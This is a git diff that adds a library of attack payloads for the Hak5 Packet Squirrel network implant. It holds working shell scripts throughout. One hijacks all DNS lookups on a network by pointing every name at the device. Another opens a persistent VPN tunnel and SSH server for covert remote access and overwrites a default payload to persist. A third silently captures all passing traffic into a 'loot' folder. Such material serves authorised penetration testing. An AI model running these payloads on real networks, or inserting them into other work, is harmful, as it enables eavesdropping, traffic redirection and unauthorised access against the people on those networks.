diff --git a/payloads/library/README.md b/payloads/library/README.md new file mode 100644 index 0000000..989f7e0 --- /dev/null +++ b/payloads/library/README.md @@ -0,0 +1 @@ +# Hak5 Packet Squirrel Payloads diff --git a/payloads/library/dnsspoof/payload.sh b/payloads/library/dnsspoof/payload.sh new file mode 100755 index 0000000..ca88fbe --- /dev/null +++ b/payloads/library/dnsspoof/payload.sh @@ -0,0 +1,29 @@ +#!/bin/bash +# DNSSpoof payload + + +function setup() { + # Show SETUP LED + LED SETUP + + # Set the network mode to NAT + NETMODE NAT + sleep 5 + + # Copy the spoofhost file to /tmp/dnsmasq.address + cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null + + # Restart dnsmasq with the new configuration + /etc/init.d/dnsmasq restart +} + +function run() { + # Show ATTACK LED + LED ATTACK + + # Redirect all DNS traffic to ourselves + iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53 +} + +setup +run diff --git a/payloads/library/dnsspoof/spoofhost b/payloads/library/dnsspoof/spoofhost new file mode 100644 index 0000000..46362a9 --- /dev/null +++ b/payloads/library/dnsspoof/spoofhost @@ -0,0 +1,2 @@ +address=/#/172.16.32.1 + diff --git a/payloads/library/openvpn/config.ovpn b/payloads/library/openvpn/config.ovpn new file mode 100644 index 0000000..e69de29 diff --git a/payloads/library/openvpn/payload.sh b/payloads/library/openvpn/payload.sh new file mode 100755 index 0000000..2e271eb --- /dev/null +++ b/payloads/library/openvpn/payload.sh @@ -0,0 +1,55 @@ +#!/bin/bash +# OpenVPN payload + +# Set to 1 to allow clients to use the VPN +FOR_CLIENTS=0 + +DNS_SERVER="8.8.8.8" + +# Cheap hack to set the DNS server +function setdns() { + while true + do + [[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && { + echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf + } + sleep 5 + done +} + +function start() { + LED SETUP + + DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd) + + # Update factory default payload + cp ${DIR}/payload.sh /root/payloads/switch3/payload.sh + + # Set NETMODE to BRIDGE and wait 3 seconds + # to ensure that things can settle + + [[ "$FOR_CLIENTS" == "1" ]] && { + /usr/bin/NETMODE VPN + } || { + /usr/bin/NETMODE BRIDGE + } + sleep 3 + + # Make OpenVPN use the local configuration + uci set openvpn.vpn.config="${DIR}/config.ovpn" + uci commit + + # Start the OpenVPN server in the background + /etc/init.d/openvpn start + + # Start SSH Server + /etc/init.d/sshd start & + + # Set DNS server + setdns & + + LED ATTACK +} + +# Start the payload +start & diff --git a/payloads/library/tcpdump/payload.sh b/payloads/library/tcpdump/payload.sh new file mode 100755 index 0000000..bc6f130 --- /dev/null +++ b/payloads/library/tcpdump/payload.sh @@ -0,0 +1,57 @@ +#!/bin/bash +# TCPDump payload v1.0 + +function monitor_space() { + while true + do + [[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && { + kill $1 + LED G SUCCESS + sync + break + } + sleep 5 + done +} + +function finish() { + # Kill TCPDump and sync filesystem + kill $1 + wait $1 + sync + + # Indicate successful shutdown + LED R SUCCESS + sleep 1 + + # Halt the system + LED OFF + halt +} + +function run() { + # Create loot directory + mkdir -p /mnt/loot/tcpdump &> /dev/null + + # Set networking to TRANSPARENT mode and wait five seconds + NETMODE TRANSPARENT + sleep 5 + + # Start tcpdump on the bridge interface + tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null & + tpid=$! + + # Wait for button to be pressed (disable button LED) + NO_LED=true BUTTON + finish $tpid +} + + +# This payload will only run if we have USB storage +[[ ! -f /mnt/NO_MOUNT ]] && { + LED ATTACK + run & + monitor_space $! & +} || { + LED FAIL +} diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh new file mode 100755 index 0000000..730b83f --- /dev/null +++ b/payloads/switch1/payload.sh @@ -0,0 +1,4 @@ +#!/bin/bash + +NETMODE NAT +LED ATTACK diff --git a/payloads/switch2/payload.sh b/payloads/switch2/payload.sh new file mode 100755 index 0000000..730b83f --- /dev/null +++ b/payloads/switch2/payload.sh @@ -0,0 +1,4 @@ +#!/bin/bash + +NETMODE NAT +LED ATTACK diff --git a/payloads/switch3/payload.sh b/payloads/switch3/payload.sh new file mode 100755 index 0000000..730b83f --- /dev/null +++ b/payloads/switch3/payload.sh @@ -0,0 +1,4 @@ +#!/bin/bash + +NETMODE NAT +LED ATTACK